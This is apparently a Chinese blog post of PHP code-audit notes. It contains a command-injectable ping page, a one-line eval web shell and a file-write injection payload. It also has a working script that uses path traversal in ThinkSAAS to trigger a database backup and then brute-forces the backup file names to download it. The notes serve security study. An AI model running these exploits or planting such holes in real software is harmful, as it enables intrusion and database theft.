PHP代码审计

代码审计辅助工具

https://github.com/WhaleShark-Team/cobra   
https://github.com/LoRexxar/Kunlun-M

变量覆盖 

extract()
import_request_variables()
parse_str()
mb_parse_str()
register_global
遍历初始化变量

file_get_contents函数绕过

1)使用php://input伪协议绕过2)用data://伪协议绕过

RCE

RCE函数
eval、preg_replace + /e模式、assertJavascript:evalVbscript: Execute、EvalPython:exec
<?php include($_SERVER['DOCUMENT_ROOT'].'/btslab/header.php'); ?>
  <br/><b>Ping:</b>Please Enter Domain Name or IP Address: <br/><br/>
  <form action="cmd.php" method="get">
  <input type="text" name="host" value=""/>
  <br/><br/><input type="submit" name="Go" value="Go"/>
  </form>
  <br/>

<?php 
if(isset($_GET['host']))
{
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
{
$result=shell_exec("ping ".$_GET['host']);
}
else
{
$result=shell_exec("ping -c 4 ".$_GET['host']);
}

echo "<b>Result:</b></br><pre>".$result."</pre>";
}
?>

<?php include($_SERVER['DOCUMENT_ROOT'].'/btslab/footer.php'); ?>
View Code
<?php
eval($_REQUEST['code']);
?>

 

 LFI -》 备份文件下载

<?php
//插件条件入口
defined('IN_TS') or die('Access Denied.');
if(is_file('plugins/'.$app.'/'.$plugin.'/'.$in.'.php')){
    require_once('plugins/'.$app.'/'.$plugin.'/'.$in.'.php');
}else{
    tsNotice('sorry:no plugin!');
}

defined('IN_TS') or die('Access Denied.');
switch($ts){
    case "":

        //输出备份文件
        $arrSqlFile = tsScanDir('data/baksql','file');

        include template('sql');
        break;

    //优化
    case "optimize":
        $arrTables = $db->fetch_all_assoc("SHOW TABLES");
        foreach($arrTables as $key=>$item){
            $db->query("OPTIMIZE TABLE `".$item."` ");
        }
        qiMsg('优化数据库成功!');
        break;

    //备份导出
    case "export":

        require_once 'thinksaas/DbManage.php';
        $bakdb = new DBManage ( $TS_DB['host'].':'.$TS_DB['port'], $TS_DB['user'], $TS_DB['pwd'], $TS_DB['name'], 'utf8' );
        $bakdb->backup ('','data/baksql/');

        qiMsg('数据库备份完毕!');

        break;


?php
date_default_timezone_set('Asia/Hong_Kong');
$url = "http://192.168.116.129/thinksaas/index.php?app=user&ac=plugin&plugin=face&in=my5t3ry/../../../../app/system/action/sql&ts=export";
file_get_contents($url);
$time = date('YmdHis');
for($i = $time; $i <= $time + 300; $i++){
    $filename = $i ."_all_v1.sql";
    $url = "http://192.168.116.129/thinksaas/data/baksql/".$filename;
    if (@file_get_contents($url, null, null, -1, 1)){
        echo $url;
    }
}
?>
View Code

 

php绕过MD5 - 科学计数法绕过

 

php绕过MD5 - 数组全等绕过

反序列化

__construct()
__destruct()
__call()
__callStatic()
__get()
__set()
__isset()
__unset()
__sleep()
__wakeup()
__toString()
__invoke()
__set_state()
__clone()
__debugInfo() 
unserialize()

 

文件写入

file_put_contents()
Payload:
');phpinfo();exit();// (');部分根据情况调整)

 

SQLI

update()

 

XSS

echo

htmlspecialchars()绕过
https://www.zhihu.com/question/27646993


 

开源项目

https://github.com/bowu678/php_bugs

 

posted @ 2019-08-09 11:03  7hang  阅读(427)  评论(0编辑  收藏  举报